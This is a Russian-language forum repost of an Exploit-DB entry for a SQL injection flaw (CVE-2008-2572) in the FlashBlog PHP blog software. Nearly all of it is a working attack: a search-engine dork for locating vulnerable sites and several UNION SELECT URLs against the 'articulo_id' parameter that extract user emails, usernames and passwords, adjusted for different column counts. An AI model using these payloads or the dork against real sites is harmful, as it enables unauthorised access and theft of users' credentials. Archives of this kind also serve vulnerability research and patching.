Exploit FlashBlog - 'articulo_id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5685
Проверка EDB
  1. Пройдено
Автор
HER0
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2572
Дата публикации
2008-05-28
Код:
###############################################################################
#
#   Name   : FlashBlog sql Inyeccion
#   Author : Her0
#   Dork   : "flashblog", allinurl:flashblog.html
#   Greetz : Komtec1,Freak,Knet,Boer,ka0x
#
###############################################################################

Proof of Concept :

    http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
   
   
The colums from host to host are diferent: all resolve =D
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/*

   
###############################################################################
#
# Mexico 2008, Thanks all my friends, I love the whisky xD
#
###############################################################################

# milw0rm.com [2008-05-28]
 
Источник
www.exploit-db.com

Похожие темы